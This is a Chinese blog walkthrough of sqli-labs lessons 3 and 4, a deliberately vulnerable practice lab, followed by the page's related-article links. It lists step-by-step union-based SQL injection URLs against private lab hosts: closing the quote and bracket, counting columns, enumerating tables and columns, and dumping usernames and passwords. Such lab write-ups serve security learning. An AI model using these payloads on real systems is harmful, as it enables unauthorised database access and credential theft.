sqli-labs第3,4关

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量150 收藏
点赞数 1
分类专栏: sqli-labs 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40565258/article/details/106995749
版权

#sqli-labs–3
http://192.168.8.228/Less-3/?id=1
在这里插入图片描述
原始页面。
http://192.168.8.228/Less-3/?id=1%27
在这里插入图片描述
根据页面返回的错误信息You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’) LIMIT 0,1’ at line 1可得,查询语句为select * from table where id=(‘1’),因此需要使用’)进行闭合。
http://192.168.8.228/Less-3/?id=1%27)%20order%20by%203–%20-
在这里插入图片描述
http://192.168.8.228/Less-3/?id=1%27)%20order%20by%204–%20-
在这里插入图片描述
猜解字段数为3。
查找回显位置:
http://192.168.8.228/Less-3/?id=-1%27)%20union%20select%201,2,3–%20-
在这里插入图片描述
union select 查询后面的回显位置,前提是前半句中的参数必须为错,即id可以为-1,或者1000000等这些不存在数。
猜解数据库名称:
http://192.168.8.228/Less-3/?id=-1%27)%20union%20select%201,database(),user()–%20-
在这里插入图片描述
当前连接的数据库为security,使用者为root@localhost。
爆表:
http://192.168.8.228/Less-3/?id=-1%27)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27–%20-
在这里插入图片描述
爆列名:
http://192.168.8.228/Less-3/?id=-1%27)%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27–%20-
在这里插入图片描述
爆数据:
http://192.168.8.228/Less-3/?id=-1%27)%20union%20select%201,group_concat(id,0x7e,username,0x7e,password,0x7e),3%20from%20users–%20-
在这里插入图片描述
#sqli-labs–4
URL:

http://192.168.1.8/Less-4/?id=5%22

在URL上加入’,发现没有报错;然后在URL上加入",页面提示如下:
在这里插入图片描述
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“5"”) LIMIT 0,1’ at line 1
通过这个页面可以看出,需要")进行闭合。
爆字段数:http://192.168.1.8/Less-4/?id=5%22)order%20by%203–%20-
在这里插入图片描述
没有报错。
http://192.168.1.8/Less-4/?id=5%22)order%20by%204–%20-
在这里插入图片描述
没有第4列字段数。
爆回显位置:
http://192.168.1.8/Less-4/?id=10000%22)union%20select%201,2,3–%20-
在这里插入图片描述
爆当前数据库名:
http://192.168.1.8/Less-4/?id=10000%22)union%20select%201,database(),3–%20-
在这里插入图片描述
爆表名:
http://192.168.1.8/Less-4/?id=10000%22)union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27–%20-
在这里插入图片描述
爆列名:
http://192.168.1.8/Less-4/?id=10000%22)union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27–%20-
在这里插入图片描述
爆数据:
http://192.168.1.8/Less-4/?id=10000%22)union%20select%201,group_concat(id,0x7e,username,0x7e,password,0x7e),3%20from%20users–%20-
这里0x7e为~。
在这里插入图片描述

weixin_40565258
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场练习笔记
11-09
- **第4:单引号注入** - **特点**:当尝试使用双引号时,页面出现错误提示或异常行为。 - **测试方法**:通过构造包含单引号的SQL语句来测试是否存在单引号注入漏洞。 - **示例**:利用`union`选择语句尝试...
422926799#note#sqli-labs第三十六1
07-25
sqli-labs Less 36代码如下:Less-36 Bypass MySQL Real Escape String//logging the conn
错误:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server vers
qq_45179513的博客
12-20 2万+
错误:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ at line 1 今天在运行项目的时候报了一个sql的错误: 于这种错误,首先就要去查看自己的sql语句是否正确 问题排查: 这是原来的代码,发现sql语句竟然多写了一个逗号。 @Override public
数据库报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL
cdada_26的博客
04-25 6万+
1. 问题描述 我们在使用数据时,常常会因各种原因报错,如下 You have an error in your SQL syntax; check the manual that corresponds to your MySQL 很多时候反复的去看sql语句,明明什么都没错,怎么会报错,那可能就是你的表名跟sql语句中的键字重了。 2. 分析 当你的表名跟键字重了,就把表名当作键字无法识别,如order,排序的键字,经常将他命名为订单表,like,模糊查询键字,经常误用为喜欢或者点赞表名,等
sqli-labs靶场无法写入问题解决“ it cannot execute this statement”和“You have an error in your SQL syntax”
02-21 1177
无法写入之"The MySQL server is running with the --secure-file-priv option so it cannot execute this statement"和“You have an error in your SQL syntax”
sqli-labs————Less-54(第四部分:提高部分)
Fly_鹏程万里
05-22 1036
前言在接下来的几中将会对前面所学习的内容做一个复习,同时也会通过在复杂环境中的应用来提高注入技巧。Less-54源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xm...
Mysql 修改字段值提示ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresp
yimaoya的博客
06-21 3769
MariaDB:ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rows'='67' at line 1
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1255
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1660
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一:Less-1 - 字符型注入 在这一卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
详细sqli-labs(1-20)通讲解
05-18
### SQLi-Labs 1-20 卡详解 #### 第一:判断是否存在 SQL 注入 本目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验...
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1516
本指南仅安全性和隐私性,而不注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
基于JAVA的厨艺交流平台(Vue.js+SpringBoot+MySQL
08-01
基于Vue.js和SpringBoot的厨艺交流平台是一个功能丰富的在线社区,旨在为烹饪爱好者提供一个分享和学习烹饪技巧的平台。该平台分为管理后台和用户网页端,支持管理员和普通用户两种角色。管理后台提供对菜谱分类、菜谱信息、食材信息、商品信息和美食日志模块的全面管理功能,包括添加、编辑、删除和查询等操作。用户网页端则为用户提供了一个友好的界面,可以浏览和搜索各种菜谱,查看食材和商品信息,发表自己的美食日志,与其他用户互动交流。整个平台采用现代化的前端技术和后端框架,保证了良好的用户体验和高效的数据处理能力。 演示录屏:https://www.bilibili.com/video/BV1uz42197zu 配套教程:https://www.bilibili.com/video/BV1pW4y1P7GR
层次分析法数学建模论文.doc
最新发布
08-01
层次分析法数学建模论文
操作系统原理试卷及参考答案(A).doc
08-01
操作系统原理试卷及参考答案(A)
客户销售额排名.xlsx.xlsx
08-01
销售管理,客户类型,客户满意度,客户登记,进销存,客户记录 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于java及C++实现的Arduino智能小车,六种控制方式(超声波避障/跟随,红外循迹/遥控,蓝牙遥控,PS2遥控)+源码
08-01
基于java及C++实现的Arduino智能小车,六种控制方式(超声波避障/跟随,红外循迹/遥控,蓝牙遥控,PS2遥控)+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档~ 基于java及C++实现的Arduino智能小车,六种控制方式(超声波避障/跟随,红外循迹/遥控,蓝牙遥控,PS2遥控)+源码,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档~ 项目简介: arduino程序使用模块化设计,可扩展各类玩法。 目前支持六种控制方式,主要分为程控方式和遥控方式, 程控方式 超声波避障 超声波跟随 红外循线 遥控方式 红外遥控 蓝牙遥控 PS2遥控
sqli-labs第三
07-28
sqli-labs第三是一个SQL注入的挑战。在这个挑战中,我们需要通过注入恶意的SQL代码来绕过应用程序的安全机制,获取后台的账号和密码。引用\[1\]中给出了一个示例的SQL语句,其中$id是一个带括号的数字型注入。我们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值